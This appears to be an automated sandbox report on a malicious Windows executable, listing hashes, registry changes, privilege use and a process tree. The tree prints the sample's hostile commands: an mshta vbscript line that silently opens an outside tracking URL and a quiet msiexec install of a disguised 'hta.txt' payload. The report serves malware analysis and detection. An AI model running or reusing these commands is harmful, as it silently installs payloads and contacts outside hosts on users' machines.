61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024

Analysis

max time kernel
229s
max time network
309s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
03/12/2022, 08:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe
Size

1.1MB
MD5

9e6fc523b4b7af53bb7bbb8e39441070
SHA1

3f461debf3faade8bcf6f9e728f45d0a30efa6a0
SHA256

61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024
SHA512

64f0f79762d5b88683d9ba9ed64c9ed0fb03b2ed9483ae6b6531dc87a6ba3688bd5c40256fecef3a8f6c6b4347c37b4f45f2821af24d9b2377f6a6445ba62cba
SSDEEP

24576:mVgdHVN5qTBqr4ETRudnITVllNv0cXruPS:mVSVNmBqrVTRuZWl1bwS

Score

7^/10

Malware Config

Signatures

Loads dropped DLL 2 IoCs

pid	Process
316	MsiExec.exe
316	MsiExec.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\Installer\6efe1e.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\6efe1e.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFF18.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI10C.tmp	msiexec.exe
File created	C:\Windows\Installer\6efe20.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 24 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F779B071-7545-11ED-A15A-6A950B37D0A0} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
904	msiexec.exe
904	msiexec.exe

Suspicious use of AdjustPrivilegeToken 40 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1804	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1804	msiexec.exe
Token: SeRestorePrivilege	904	msiexec.exe
Token: SeTakeOwnershipPrivilege	904	msiexec.exe
Token: SeSecurityPrivilege	904	msiexec.exe
Token: SeCreateTokenPrivilege	1804	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1804	msiexec.exe
Token: SeLockMemoryPrivilege	1804	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1804	msiexec.exe
Token: SeMachineAccountPrivilege	1804	msiexec.exe
Token: SeTcbPrivilege	1804	msiexec.exe
Token: SeSecurityPrivilege	1804	msiexec.exe
Token: SeTakeOwnershipPrivilege	1804	msiexec.exe
Token: SeLoadDriverPrivilege	1804	msiexec.exe
Token: SeSystemProfilePrivilege	1804	msiexec.exe
Token: SeSystemtimePrivilege	1804	msiexec.exe
Token: SeProfSingleProcessPrivilege	1804	msiexec.exe
Token: SeIncBasePriorityPrivilege	1804	msiexec.exe
Token: SeCreatePagefilePrivilege	1804	msiexec.exe
Token: SeCreatePermanentPrivilege	1804	msiexec.exe
Token: SeBackupPrivilege	1804	msiexec.exe
Token: SeRestorePrivilege	1804	msiexec.exe
Token: SeShutdownPrivilege	1804	msiexec.exe
Token: SeDebugPrivilege	1804	msiexec.exe
Token: SeAuditPrivilege	1804	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1804	msiexec.exe
Token: SeChangeNotifyPrivilege	1804	msiexec.exe
Token: SeRemoteShutdownPrivilege	1804	msiexec.exe
Token: SeUndockPrivilege	1804	msiexec.exe
Token: SeSyncAgentPrivilege	1804	msiexec.exe
Token: SeEnableDelegationPrivilege	1804	msiexec.exe
Token: SeManageVolumePrivilege	1804	msiexec.exe
Token: SeImpersonatePrivilege	1804	msiexec.exe
Token: SeCreateGlobalPrivilege	1804	msiexec.exe
Token: SeRestorePrivilege	904	msiexec.exe
Token: SeTakeOwnershipPrivilege	904	msiexec.exe
Token: SeRestorePrivilege	904	msiexec.exe
Token: SeTakeOwnershipPrivilege	904	msiexec.exe
Token: SeRestorePrivilege	904	msiexec.exe
Token: SeTakeOwnershipPrivilege	904	msiexec.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1280	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1280	iexplore.exe
1280	iexplore.exe
1908	IEXPLORE.EXE
1908	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 596 wrote to memory of 1496	596	61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe	27
PID 596 wrote to memory of 1496	596	61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe	27
PID 596 wrote to memory of 1496	596	61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe	27
PID 596 wrote to memory of 1496	596	61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe	27
PID 1496 wrote to memory of 1264	1496	cmd.exe	29
PID 1496 wrote to memory of 1264	1496	cmd.exe	29
PID 1496 wrote to memory of 1264	1496	cmd.exe	29
PID 1496 wrote to memory of 1264	1496	cmd.exe	29
PID 1264 wrote to memory of 1280	1264	mshta.exe	30
PID 1264 wrote to memory of 1280	1264	mshta.exe	30
PID 1264 wrote to memory of 1280	1264	mshta.exe	30
PID 1264 wrote to memory of 1280	1264	mshta.exe	30
PID 1280 wrote to memory of 1908	1280	iexplore.exe	32
PID 1280 wrote to memory of 1908	1280	iexplore.exe	32
PID 1280 wrote to memory of 1908	1280	iexplore.exe	32
PID 1280 wrote to memory of 1908	1280	iexplore.exe	32
PID 1496 wrote to memory of 1804	1496	cmd.exe	33
PID 1496 wrote to memory of 1804	1496	cmd.exe	33
PID 1496 wrote to memory of 1804	1496	cmd.exe	33
PID 1496 wrote to memory of 1804	1496	cmd.exe	33
PID 1496 wrote to memory of 1804	1496	cmd.exe	33
PID 1496 wrote to memory of 1804	1496	cmd.exe	33
PID 1496 wrote to memory of 1804	1496	cmd.exe	33
PID 904 wrote to memory of 316	904	msiexec.exe	35
PID 904 wrote to memory of 316	904	msiexec.exe	35
PID 904 wrote to memory of 316	904	msiexec.exe	35
PID 904 wrote to memory of 316	904	msiexec.exe	35
PID 904 wrote to memory of 316	904	msiexec.exe	35
PID 904 wrote to memory of 316	904	msiexec.exe	35
PID 904 wrote to memory of 316	904	msiexec.exe	35

C:\Users\Admin\AppData\Local\Temp\61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe
"C:\Users\Admin\AppData\Local\Temp\61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:596
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Users\Admin\AppData\Local\Temp\~8769.bat "C:\Users\Admin\AppData\Local\Temp\61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1496
- - C:\Windows\SysWOW64\mshta.exe
    mshta vbscript:createobject("wscript.shell").run("""iexplore""http://cnzz.sjt8.com/info.access/?stat_it",0)(window.close)
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory
    PID:1264
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://cnzz.sjt8.com/info.access/?stat_it
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1280
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1280 CREDAT:275457 /prefetch:2
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1908
- - C:\Windows\SysWOW64\msiexec.exe
    msiexec.exe /i "C:\Users\Admin\AppData\Local\hta.txt" /quiet
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1804

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:904
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 327DB6C15EB74EA8D976CEE92724FCDF
  2⤵
  - Loads dropped DLL
  PID:316

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\~8769.bat

Filesize
1KB

MD5
55e6b633560859a79fd6ab59c989aa4a

SHA1
b949ead8ee10d1ec202f0574a892d15f3a772ca9

SHA256
4da99471f0c9dd4779eeac2bb1dc232a036d9502226b091e1cc30816179d8f02

SHA512
a13fca308a9fc826f535783f35a3c5eaf6a14446a9ab5c650f1aaae6c63b1e8ad316640d933b563d06ee3810280b38e0de3eca46ae2be785710057cf1f7c1a8e

Download Submit
C:\Users\Admin\AppData\Local\hta.txt

Filesize
240KB

MD5
3fb2866481cf0d5bf34222343ef9834f

SHA1
3699c4d5821d347a82283b000c5e8e6cb5d23473

SHA256
f2dfda3c25046a5fa249df5efd5646ed01f4b4d3fbe7b4f939b158306d9956db

SHA512
71d4c040b8b9ed9a41aa11693fd1f1fa5cdef05bcb3f75c2a58d76816df1b0aef794019bc10ec107b4b6b260976ebda99357da3ebc441938d3c3a7a20ad1dc7c

Download Submit
C:\Windows\Installer\MSI10C.tmp

Filesize
48KB

MD5
9067aad412defc0d2888479609041392

SHA1
36cfffc3bafeb24f88ad5886ca5787ca008b6ba9

SHA256
99f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517

SHA512
e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a

Download Submit
C:\Windows\Installer\MSIFF18.tmp

Filesize
48KB

MD5
9067aad412defc0d2888479609041392

SHA1
36cfffc3bafeb24f88ad5886ca5787ca008b6ba9

SHA256
99f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517

SHA512
e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a

Download Submit
\Windows\Installer\MSI10C.tmp

Filesize
48KB

MD5
9067aad412defc0d2888479609041392

SHA1
36cfffc3bafeb24f88ad5886ca5787ca008b6ba9

SHA256
99f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517

SHA512
e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a

Download Submit
\Windows\Installer\MSIFF18.tmp

Filesize
48KB

MD5
9067aad412defc0d2888479609041392

SHA1
36cfffc3bafeb24f88ad5886ca5787ca008b6ba9

SHA256
99f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517

SHA512
e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a

Download Submit
memory/596-54-0x0000000076201000-0x0000000076203000-memory.dmp

Filesize
8KB

Download
memory/904-61-0x000007FEFC311000-0x000007FEFC313000-memory.dmp

Filesize
8KB

Download